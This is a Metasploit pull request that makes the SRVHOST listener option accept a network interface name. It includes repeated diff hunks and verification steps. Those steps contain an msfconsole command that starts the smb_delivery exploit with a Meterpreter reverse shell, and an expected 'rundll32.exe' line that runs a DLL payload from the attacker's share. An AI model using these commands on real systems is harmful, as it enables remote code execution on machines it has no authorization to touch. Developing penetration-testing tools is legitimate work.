### PR TITLE
Use OptAddressLocal for SRVHOST to specify by interface name instead of IP

### DIFF
--- a/lib/msf/core/exploit/socket_server.rb
+++ b/lib/msf/core/exploit/socket_server.rb
@@ -18,7 +18,7 @@ module Exploit::Remote::SocketServer
 
     register_options(
       [
-        OptAddressLocal.new('SRVHOST', [ true, "The local host to listen on. This must be an address on the local machine or 0.0.0.0", '0.0.0.0' ]),
+        OptAddressLocal.new('SRVHOST', [ true, 'The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0.', '0.0.0.0' ]),
         OptPort.new('SRVPORT',    [ true, "The local port to listen on.", 8080 ]),
 
       ], Msf::Exploit::Remote::SocketServer
@@ -183,4 +183,3 @@ protected
 end
 
 end
-

--- a/lib/msf/core/exploit/socket_server.rb
+++ b/lib/msf/core/exploit/socket_server.rb
@@ -18,7 +18,7 @@ module Exploit::Remote::SocketServer
 
     register_options(
       [
-        OptAddressLocal.new('SRVHOST', [ true, 'The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0.', '0.0.0.0' ]),
+        OptAddressLocal.new('SRVHOST', [ true, 'The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.', '0.0.0.0' ]),
         OptPort.new('SRVPORT',    [ true, "The local port to listen on.", 8080 ]),
 
       ], Msf::Exploit::Remote::SocketServer

--- a/lib/msf/core/exploit/socket_server.rb
+++ b/lib/msf/core/exploit/socket_server.rb
@@ -18,7 +18,7 @@ module Exploit::Remote::SocketServer
 
     register_options(
       [
-        OptAddress.new('SRVHOST', [ true, "The local host to listen on. This must be an address on the local machine or 0.0.0.0", '0.0.0.0' ]),
+        OptAddressLocal.new('SRVHOST', [ true, "The local host to listen on. This must be an address on the local machine or 0.0.0.0", '0.0.0.0' ]),
         OptPort.new('SRVPORT',    [ true, "The local port to listen on.", 8080 ]),
 
       ], Msf::Exploit::Remote::SocketServer


### PR DESCRIPTION
Thanks to #8336 we can now specify LHOST by interface name instead of IP which is really nice.
I got this habit and now I want to apply it to SRVHOST too :)

## Verification

- [x] Start `msfconsole -x "use windows/smb/smb_delivery; set srvhost eth0; set payload windows/meterpreter/reverse_tcp; set lhost eth0; run"`
- [x] **Verify** that you have (adapt for your eth0 IP):
`[*] Started service listener on 192.168.42.100:445`
- [x] **Verify** that you have:
```
[*] Run the following command on the target machine:
rundll32.exe \\192.168.42.100\fyBWzD\test.dll,0
```
- [x] **Verify** that there is no "eth0" mentioned in the output

TODO:
- [x] **Document** (any idea where?)
- [x] **Globalize** to other modules which use "SRVHOST"

I will gladly do these remaining tasks if you like this PR :)